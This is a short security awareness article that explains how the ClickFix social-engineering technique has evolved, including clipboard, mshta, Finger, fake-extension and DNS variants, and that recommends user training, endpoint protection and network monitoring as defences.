Over the last year, cybercriminals have increasingly used a trick called ClickFix to get people to run harmful software on their own computers. The core idea is always the same — attackers use social engineering to convince someone to execute a command that ends up installing malware on their machine. In most cases, that command is a PowerShell script that runs with the person’s own permissions, making it easy for the attacker to take control.

How ClickFix grew and changed

When the ClickFix trend first appeared, the setup was simple: victims were told they needed to “fix” a fake problem or pass a fake CAPTCHA. To do so, they were instructed to copy a long piece of text, open the Windows Run dialog (Win + R), paste the text, and hit Enter. That text was actually a malicious command that gave attackers access.

Since then, attackers have invented a variety of new twists on this basic idea:

1. Using legitimate tools like mshta.exe
In some attacks, users aren’t asked to copy anything — the malicious code is automatically placed on the clipboard without them realising it. The command then launches a legitimate Windows tool (mshta.exe) that connects to the attacker’s server and runs harmful code.

2. Video guides on social platforms
Some campaigns have used TikTok videos that look like harmless tutorials. They tell viewers to open PowerShell with administrator rights and run a command that downloads malware.

3. Using the old Finger network protocol
Another variant tricks users into running commands that connect to a remote server using the outdated Finger protocol. That server sends back a malicious script which installs malware on the victim’s machine.

4. “CrashFix” trick
In this version, attackers create a fake browser extension that pretends to be a useful tool. After it crashes the browser, a fake error message tells the user to run a command. Following the instructions leads to malware installation just like the other ClickFix variants.

5. Payload via DNS lookup
Some attacks add a step where the malicious command makes a DNS request to a server controlled by the attackers. The DNS response contains further code, which then downloads the final malware payload.

How to defend against ClickFix-style attacks

The simplest advice — like blocking Win + R — only stops very basic ClickFix cases. Because attackers now use many different tricks, the most effective defences are:

• Train users to recognise social-engineering scams — anyone who asks people to run unusual commands or perform strange actions is almost certainly doing something malicious.
• Use strong endpoint protection — security software can often block dangerous scripts before they run.
• Monitor network activity — suspicious patterns can indicate that an infection is in progress.
• Consider managed security services if you don’t have in-house expertise.